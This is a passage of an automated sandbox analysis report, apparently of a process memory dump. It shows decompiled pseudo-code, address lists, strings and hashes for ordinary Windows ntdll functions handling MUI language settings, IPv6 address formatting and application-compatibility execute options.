						E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                                                                          0x008f8788
                                                                                                                                                                                                          0x008f8788
                                                                                                                                                                                                          0x008f8791
                                                                                                                                                                                                          0x008f8794
                                                                                                                                                                                                          0x008f8798
                                                                                                                                                                                                          0x008f879b
                                                                                                                                                                                                          0x008f879e
                                                                                                                                                                                                          0x008f87a1
                                                                                                                                                                                                          0x008f87a4
                                                                                                                                                                                                          0x008f87a7
                                                                                                                                                                                                          0x008f87aa
                                                                                                                                                                                                          0x008f87af
                                                                                                                                                                                                          0x00941ad3
                                                                                                                                                                                                          0x008f8b0a
                                                                                                                                                                                                          0x008f8b0d
                                                                                                                                                                                                          0x008f8b13
                                                                                                                                                                                                          0x008f8b19
                                                                                                                                                                                                          0x008f8b1f
                                                                                                                                                                                                          0x008f8b25
                                                                                                                                                                                                          0x008f8b2b
                                                                                                                                                                                                          0x008f8b31
                                                                                                                                                                                                          0x008f8b37
                                                                                                                                                                                                          0x008f8b3d
                                                                                                                                                                                                          0x008f8b46
                                                                                                                                                                                                          0x008f8b46
                                                                                                                                                                                                          0x008f87c6
                                                                                                                                                                                                          0x008f87d0
                                                                                                                                                                                                          0x00941ae0
                                                                                                                                                                                                          0x00941ae6
                                                                                                                                                                                                          0x00941af8
                                                                                                                                                                                                          0x00941af8
                                                                                                                                                                                                          0x00941afd
                                                                                                                                                                                                          0x00941afe
                                                                                                                                                                                                          0x00941b01
                                                                                                                                                                                                          0x00941b06
                                                                                                                                                                                                          0x00941b06
                                                                                                                                                                                                          0x008f87d6
                                                                                                                                                                                                          0x008f87f2
                                                                                                                                                                                                          0x008f87f7
                                                                                                                                                                                                          0x008f8807
                                                                                                                                                                                                          0x008f880a
                                                                                                                                                                                                          0x008f880f
                                                                                                                                                                                                          0x008f8810
                                                                                                                                                                                                          0x008f8813
                                                                                                                                                                                                          0x008f8818
                                                                                                                                                                                                          0x008f8818
                                                                                                                                                                                                          0x008f882c
                                                                                                                                                                                                          0x008f8831
                                                                                                                                                                                                          0x008f8838
                                                                                                                                                                                                          0x008f8908
                                                                                                                                                                                                          0x008f8920
                                                                                                                                                                                                          0x008f89f0
                                                                                                                                                                                                          0x008f8a08
                                                                                                                                                                                                          0x008f8af6
                                                                                                                                                                                                          0x008f8af6
                                                                                                                                                                                                          0x008f8af8
                                                                                                                                                                                                          0x008f8afb
                                                                                                                                                                                                          0x00941beb
                                                                                                                                                                                                          0x00941beb
                                                                                                                                                                                                          0x008f8b04
                                                                                                                                                                                                          0x00941bf8
                                                                                                                                                                                                          0x00941c0e
                                                                                                                                                                                                          0x00941c13
                                                                                                                                                                                                          0x00941c16
                                                                                                                                                                                                          0x00941c16
                                                                                                                                                                                                          0x00941bf8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f8b04
                                                                                                                                                                                                          0x008f8a0e
                                                                                                                                                                                                          0x008f8a11
                                                                                                                                                                                                          0x008f8a14
                                                                                                                                                                                                          0x008f8a15
                                                                                                                                                                                                          0x008f8a18
                                                                                                                                                                                                          0x008f8a22
                                                                                                                                                                                                          0x008f8b59
                                                                                                                                                                                                          0x008f8a28
                                                                                                                                                                                                          0x008f8a3c
                                                                                                                                                                                                          0x008f8a3c
                                                                                                                                                                                                          0x008f8a42
                                                                                                                                                                                                          0x00941bb0
                                                                                                                                                                                                          0x00941b11
                                                                                                                                                                                                          0x00941b11
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f8a48
                                                                                                                                                                                                          0x008f8a51
                                                                                                                                                                                                          0x008f8a5b
                                                                                                                                                                                                          0x008f8a5e
                                                                                                                                                                                                          0x008f8a61
                                                                                                                                                                                                          0x008f8a69
                                                                                                                                                                                                          0x008f8a69
                                                                                                                                                                                                          0x008f8a6d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f8a74
                                                                                                                                                                                                          0x008f8a7c
                                                                                                                                                                                                          0x008f8a7d
                                                                                                                                                                                                          0x008f8a91
                                                                                                                                                                                                          0x008f8a93
                                                                                                                                                                                                          0x008f8a93
                                                                                                                                                                                                          0x008f8a98
                                                                                                                                                                                                          0x008f8a9b
                                                                                                                                                                                                          0x008f8aa1
                                                                                                                                                                                                          0x008f8aa1
                                                                                                                                                                                                          0x008f8aa4
                                                                                                                                                                                                          0x008f8aaa
                                                                                                                                                                                                          0x008f8ab1
                                                                                                                                                                                                          0x008f8ac5
                                                                                                                                                                                                          0x008f8ac7
                                                                                                                                                                                                          0x008f8ac7
                                                                                                                                                                                                          0x008f8ac5
                                                                                                                                                                                                          0x008f8ace
                                                                                                                                                                                                          0x00941bc9
                                                                                                                                                                                                          0x00941bce
                                                                                                                                                                                                          0x00941bd2
                                                                                                                                                                                                          0x00941bd2
                                                                                                                                                                                                          0x008f8ad8
                                                                                                                                                                                                          0x008f8aeb
                                                                                                                                                                                                          0x008f8aeb
                                                                                                                                                                                                          0x008f8af0
                                                                                                                                                                                                          0x008f8af4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f8af4
                                                                                                                                                                                                          0x008f8a42
                                                                                                                                                                                                          0x008f8926
                                                                                                                                                                                                          0x008f8929
                                                                                                                                                                                                          0x008f892c
                                                                                                                                                                                                          0x008f892d
                                                                                                                                                                                                          0x008f8930
                                                                                                                                                                                                          0x008f8935
                                                                                                                                                                                                          0x008f893a
                                                                                                                                                                                                          0x008f8b51
                                                                                                                                                                                                          0x008f8940
                                                                                                                                                                                                          0x008f8954
                                                                                                                                                                                                          0x008f8954
                                                                                                                                                                                                          0x008f895a
                                                                                                                                                                                                          0x00941b63
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f8960
                                                                                                                                                                                                          0x008f8969
                                                                                                                                                                                                          0x008f8973
                                                                                                                                                                                                          0x008f8976
                                                                                                                                                                                                          0x008f8979
                                                                                                                                                                                                          0x008f897e
                                                                                                                                                                                                          0x008f8981
                                                                                                                                                                                                          0x008f8981
                                                                                                                                                                                                          0x008f8986
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00941b6e
                                                                                                                                                                                                          0x00941b74
                                                                                                                                                                                                          0x00941b7b
                                                                                                                                                                                                          0x00941b8f
                                                                                                                                                                                                          0x00941b91
                                                                                                                                                                                                          0x00941b91
                                                                                                                                                                                                          0x00941b99
                                                                                                                                                                                                          0x00941b9c
                                                                                                                                                                                                          0x00941ba2
                                                                                                                                                                                                          0x00941ba2
                                                                                                                                                                                                          0x008f898c
                                                                                                                                                                                                          0x008f8992
                                                                                                                                                                                                          0x008f8999
                                                                                                                                                                                                          0x008f89ad
                                                                                                                                                                                                          0x00941ba8
                                                                                                                                                                                                          0x00941ba8
                                                                                                                                                                                                          0x008f89ad
                                                                                                                                                                                                          0x008f89b6
                                                                                                                                                                                                          0x008f89c8
                                                                                                                                                                                                          0x008f89cd
                                                                                                                                                                                                          0x008f89d0
                                                                                                                                                                                                          0x008f89d0
                                                                                                                                                                                                          0x008f89d6
                                                                                                                                                                                                          0x008f89e8
                                                                                                                                                                                                          0x008f89e8
                                                                                                                                                                                                          0x008f89ed
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f89ed
                                                                                                                                                                                                          0x008f895a
                                                                                                                                                                                                          0x008f883e
                                                                                                                                                                                                          0x008f8841
                                                                                                                                                                                                          0x008f8844
                                                                                                                                                                                                          0x008f8845
                                                                                                                                                                                                          0x008f8848
                                                                                                                                                                                                          0x008f884d
                                                                                                                                                                                                          0x008f8852
                                                                                                                                                                                                          0x008f8b49
                                                                                                                                                                                                          0x008f8858
                                                                                                                                                                                                          0x008f886c
                                                                                                                                                                                                          0x008f886c
                                                                                                                                                                                                          0x008f8872
                                                                                                                                                                                                          0x00941b0e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f8878
                                                                                                                                                                                                          0x008f8881
                                                                                                                                                                                                          0x008f888b
                                                                                                                                                                                                          0x008f888e
                                                                                                                                                                                                          0x008f8891
                                                                                                                                                                                                          0x008f8896
                                                                                                                                                                                                          0x008f8899
                                                                                                                                                                                                          0x008f8899
                                                                                                                                                                                                          0x008f889e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00941b21
                                                                                                                                                                                                          0x00941b27
                                                                                                                                                                                                          0x00941b2e
                                                                                                                                                                                                          0x00941b42
                                                                                                                                                                                                          0x00941b44
                                                                                                                                                                                                          0x00941b44
                                                                                                                                                                                                          0x00941b4c
                                                                                                                                                                                                          0x00941b4f
                                                                                                                                                                                                          0x00941b55
                                                                                                                                                                                                          0x00941b55
                                                                                                                                                                                                          0x008f88a4
                                                                                                                                                                                                          0x008f88aa
                                                                                                                                                                                                          0x008f88b1
                                                                                                                                                                                                          0x008f88c5
                                                                                                                                                                                                          0x00941b5b
                                                                                                                                                                                                          0x00941b5b
                                                                                                                                                                                                          0x008f88c5
                                                                                                                                                                                                          0x008f88ce
                                                                                                                                                                                                          0x008f88e0
                                                                                                                                                                                                          0x008f88e5
                                                                                                                                                                                                          0x008f88e8
                                                                                                                                                                                                          0x008f88e8
                                                                                                                                                                                                          0x008f88ee
                                                                                                                                                                                                          0x008f8900
                                                                                                                                                                                                          0x008f8900
                                                                                                                                                                                                          0x008f8905
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f8905

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • WindowsExcludedProcs, xrefs: 008F87C1
                                                                                                                                                                                                          • Kernel-MUI-Language-Allowed, xrefs: 008F8827
                                                                                                                                                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 008F8914
                                                                                                                                                                                                          • Kernel-MUI-Number-Allowed, xrefs: 008F87E6
                                                                                                                                                                                                          • Kernel-MUI-Language-SKU, xrefs: 008F89FC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcspbrk
                                                                                                                                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                          • API String ID: 402402107-258546922
                                                                                                                                                                                                          • Opcode ID: acbb8161ad49328a9377f48e456bbf15f84dc76b4881b836b64630b19f89b1de
                                                                                                                                                                                                          • Instruction ID: f47b570781f02acabaa28c5ef49b2998d32585ae6f332fb3c69698850157f5bc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: acbb8161ad49328a9377f48e456bbf15f84dc76b4881b836b64630b19f89b1de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29F1B5B2D0024DEFCF11EFA9C981DAEBBB8FB08304F14456AE605E7211EB359A45DB51
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 009113CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 38%
                                                                                                                                                                                                          			E009113CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00907707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x8d2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00907707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x8d9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00907707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00907707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00907707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00907707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                                                                          0x009113d5
                                                                                                                                                                                                          0x009113d9
                                                                                                                                                                                                          0x009113dc
                                                                                                                                                                                                          0x009113de
                                                                                                                                                                                                          0x009113e1
                                                                                                                                                                                                          0x009113e8
                                                                                                                                                                                                          0x009113ee
                                                                                                                                                                                                          0x0093e8fd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093e921
                                                                                                                                                                                                          0x0093e921
                                                                                                                                                                                                          0x0093e928
                                                                                                                                                                                                          0x0093e982
                                                                                                                                                                                                          0x0093e98a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093e99a
                                                                                                                                                                                                          0x0093e99e
                                                                                                                                                                                                          0x0093e9a3
                                                                                                                                                                                                          0x0093e9a8
                                                                                                                                                                                                          0x0093e9b9
                                                                                                                                                                                                          0x0093e978
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093e978
                                                                                                                                                                                                          0x0093e98a
                                                                                                                                                                                                          0x0093e92a
                                                                                                                                                                                                          0x0093e931
                                                                                                                                                                                                          0x0093e944
                                                                                                                                                                                                          0x0093e944
                                                                                                                                                                                                          0x0093e950
                                                                                                                                                                                                          0x0093e954
                                                                                                                                                                                                          0x0093e959
                                                                                                                                                                                                          0x0093e95e
                                                                                                                                                                                                          0x0093e963
                                                                                                                                                                                                          0x0093e970
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093e975
                                                                                                                                                                                                          0x0093e93b
                                                                                                                                                                                                          0x0093e980
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093e980
                                                                                                                                                                                                          0x0093e942
                                                                                                                                                                                                          0x0093e94b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093e94b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093e942
                                                                                                                                                                                                          0x009113f4
                                                                                                                                                                                                          0x009113f4
                                                                                                                                                                                                          0x009113f9
                                                                                                                                                                                                          0x009113fc
                                                                                                                                                                                                          0x009113ff
                                                                                                                                                                                                          0x00911406
                                                                                                                                                                                                          0x0093e9cc
                                                                                                                                                                                                          0x0093e9d2
                                                                                                                                                                                                          0x0093e9d2
                                                                                                                                                                                                          0x0093e9cc
                                                                                                                                                                                                          0x0091140c
                                                                                                                                                                                                          0x00911411
                                                                                                                                                                                                          0x00911431
                                                                                                                                                                                                          0x0091143a
                                                                                                                                                                                                          0x0091143c
                                                                                                                                                                                                          0x0091143f
                                                                                                                                                                                                          0x0091143f
                                                                                                                                                                                                          0x00911442
                                                                                                                                                                                                          0x00911447
                                                                                                                                                                                                          0x009114a8
                                                                                                                                                                                                          0x009114ac
                                                                                                                                                                                                          0x0093e9e2
                                                                                                                                                                                                          0x0093e9e7
                                                                                                                                                                                                          0x0093e9ec
                                                                                                                                                                                                          0x0093ea05
                                                                                                                                                                                                          0x0093ea05
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00911449
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00911449
                                                                                                                                                                                                          0x0091144c
                                                                                                                                                                                                          0x00911459
                                                                                                                                                                                                          0x00911462
                                                                                                                                                                                                          0x00911469
                                                                                                                                                                                                          0x0091146a
                                                                                                                                                                                                          0x00911470
                                                                                                                                                                                                          0x00911473
                                                                                                                                                                                                          0x00911476
                                                                                                                                                                                                          0x00911476
                                                                                                                                                                                                          0x00911490
                                                                                                                                                                                                          0x00911495
                                                                                                                                                                                                          0x0091138e
                                                                                                                                                                                                          0x00911390
                                                                                                                                                                                                          0x00911397
                                                                                                                                                                                                          0x00911398
                                                                                                                                                                                                          0x00911399
                                                                                                                                                                                                          0x009113a1
                                                                                                                                                                                                          0x009113a4
                                                                                                                                                                                                          0x009113a4
                                                                                                                                                                                                          0x00911498
                                                                                                                                                                                                          0x0091149c
                                                                                                                                                                                                          0x0091149f
                                                                                                                                                                                                          0x009114a2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009114a4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009114a4
                                                                                                                                                                                                          0x00911413
                                                                                                                                                                                                          0x00911415
                                                                                                                                                                                                          0x00911416
                                                                                                                                                                                                          0x00911419
                                                                                                                                                                                                          0x0091141c
                                                                                                                                                                                                          0x00911422
                                                                                                                                                                                                          0x009113b7
                                                                                                                                                                                                          0x009113bc
                                                                                                                                                                                                          0x009113bf
                                                                                                                                                                                                          0x009113bf
                                                                                                                                                                                                          0x009113c2
                                                                                                                                                                                                          0x00911424
                                                                                                                                                                                                          0x00911424
                                                                                                                                                                                                          0x00911424
                                                                                                                                                                                                          0x00911427
                                                                                                                                                                                                          0x0091142b
                                                                                                                                                                                                          0x0091142c
                                                                                                                                                                                                          0x0091142c
                                                                                                                                                                                                          0x0091142c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0091141c
                                                                                                                                                                                                          0x00911411

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                                                                          • Opcode ID: 56a4cff055ee8de93d508e931b3c753281a01f94cf00d0a19cd2695a641d1373
                                                                                                                                                                                                          • Instruction ID: c3c8a4403d4c3e50505fda22e4a57903c9bbbbdc1b405f6172b2c5bee5dbc617
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56a4cff055ee8de93d508e931b3c753281a01f94cf00d0a19cd2695a641d1373
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A612D71E04659BACF24DF99C8808FFBBB9EF94700B14C52EE5E547680D334AA80CB60
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00907EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                          			E00907EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x9b2088; // 0x7753cceb
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00907F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00923F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E008DDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x9b4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00923F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E008E0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00923F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E008E8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00923F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0094E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00923F92();
					_t38 = 1;
					L2:
					return E008DE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                                                                          0x00907f08
                                                                                                                                                                                                          0x00907f0f
                                                                                                                                                                                                          0x00907f12
                                                                                                                                                                                                          0x00907f1b
                                                                                                                                                                                                          0x00907f31
                                                                                                                                                                                                          0x00923ead
                                                                                                                                                                                                          0x00923eb4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00923eba
                                                                                                                                                                                                          0x00923ecd
                                                                                                                                                                                                          0x00923ed2
                                                                                                                                                                                                          0x00923ee1
                                                                                                                                                                                                          0x00923ee7
                                                                                                                                                                                                          0x00923eec
                                                                                                                                                                                                          0x00923f12
                                                                                                                                                                                                          0x00923f18
                                                                                                                                                                                                          0x00923f1a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00923f20
                                                                                                                                                                                                          0x00923f26
                                                                                                                                                                                                          0x00923f28
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00923f2e
                                                                                                                                                                                                          0x00923f30
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00923f3a
                                                                                                                                                                                                          0x00923f3b
                                                                                                                                                                                                          0x00923f53
                                                                                                                                                                                                          0x00923f64
                                                                                                                                                                                                          0x00923f69
                                                                                                                                                                                                          0x00923f6c
                                                                                                                                                                                                          0x00923f6d
                                                                                                                                                                                                          0x00923f6f
                                                                                                                                                                                                          0x0092e304
                                                                                                                                                                                                          0x0092e30f
                                                                                                                                                                                                          0x0092e315
                                                                                                                                                                                                          0x0092e31e
                                                                                                                                                                                                          0x0092e321
                                                                                                                                                                                                          0x0092e327
                                                                                                                                                                                                          0x0092e329
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0092e32f
                                                                                                                                                                                                          0x0092e32f
                                                                                                                                                                                                          0x0092e337
                                                                                                                                                                                                          0x0092e33a
                                                                                                                                                                                                          0x0092e33b
                                                                                                                                                                                                          0x0092e33d
                                                                                                                                                                                                          0x0092e33f
                                                                                                                                                                                                          0x0092e341
                                                                                                                                                                                                          0x0092e341
                                                                                                                                                                                                          0x0092e34e
                                                                                                                                                                                                          0x0092e353
                                                                                                                                                                                                          0x0092e358
                                                                                                                                                                                                          0x0092e35d
                                                                                                                                                                                                          0x0092e35f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0092e365
                                                                                                                                                                                                          0x0092e365
                                                                                                                                                                                                          0x0092e368
                                                                                                                                                                                                          0x0092e36e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0092e374
                                                                                                                                                                                                          0x0092e32f
                                                                                                                                                                                                          0x00923f75
                                                                                                                                                                                                          0x00923f7a
                                                                                                                                                                                                          0x00923f7c
                                                                                                                                                                                                          0x00923f7e
                                                                                                                                                                                                          0x00923f86
                                                                                                                                                                                                          0x00907f39
                                                                                                                                                                                                          0x00907f47
                                                                                                                                                                                                          0x00907f47
